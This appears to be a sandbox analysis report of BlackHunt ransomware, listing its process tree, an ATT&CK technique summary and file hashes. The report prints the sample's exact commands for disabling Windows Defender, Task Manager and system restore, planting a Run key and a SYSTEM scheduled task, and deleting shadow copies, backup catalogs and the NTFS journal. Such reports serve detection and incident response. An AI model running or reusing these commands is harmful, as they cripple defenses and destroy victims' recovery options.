C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:1792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵PID:2056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:3596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3624 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:232
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:4172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:5048
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:3264
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:4940
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:3064
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:3700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2136
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:4728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:4000
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:1792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2252
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4528
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4864
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:4936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2000
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:5052
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4244
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:3324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2228
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:4180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4464
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:4668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4960
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:4192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4200
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2128
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4264
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵
- Adds Run key to start application
PID:2056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:404
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe" /F2⤵PID:2492
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe" /F3⤵
- Creates scheduled task(s)
PID:3232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2380
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:3596
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2632
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:4388
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3632
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2276
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4396
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4124
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4308
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
- Drops file in Windows directory
PID:5768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3200
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:908
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5956
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:6124
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:1552
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5828
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD514d2feda25cb89f750a1f599118463de
SHA113f52b42fe84ab2f41f0ad9e36e9426d46ac6d43
SHA2567f62660cf7e463fe57220a01b748acd0219fc6ec857aeb1b0f5af13c97fc9ae5
SHA512a29c68bb04806bcbe837c278759f2615f5a4a11767a8928cd8d4569c0f33759eb35aa098e82aa9d56457a04e3bb9935561a5358883158d011c4bbf49eb7868c1
-
Filesize
684B
MD5155a328992c10b429fb06b073d0c0caa
SHA1410dc37aceb1907f6080fa97821d636fde1e0408
SHA256f23bae720da8b088fb048435be5b9f0fe4dd9571b3abb7daae438c577db8f5ed
SHA5128921e6165752bb74a0a48dbd0617eea93ec4ef0072d59f410dd68e48fbb6f44631abd51d2b5ec815acb7feba542638e23a0f87b8e1375b7eca63d7c446d28289
-
Filesize
12KB
MD5e51ddffd6d06f6ac40d969eec6479f1c
SHA1cddf4539bd5a730d8bd681e12805aa9110ebe49c
SHA2560892ea7ab61b04fe9060a14889b5e3f0dc5e2d6915cbd962d81c93dfe5631c8f
SHA5125e7656eebfd5655d652ff985d89e603665b9ee97e2ce87331e22365ed123d0525022a983f7a1e1d4f3dc96cca4fbeead771817cf91dad89db8882dd491aa526e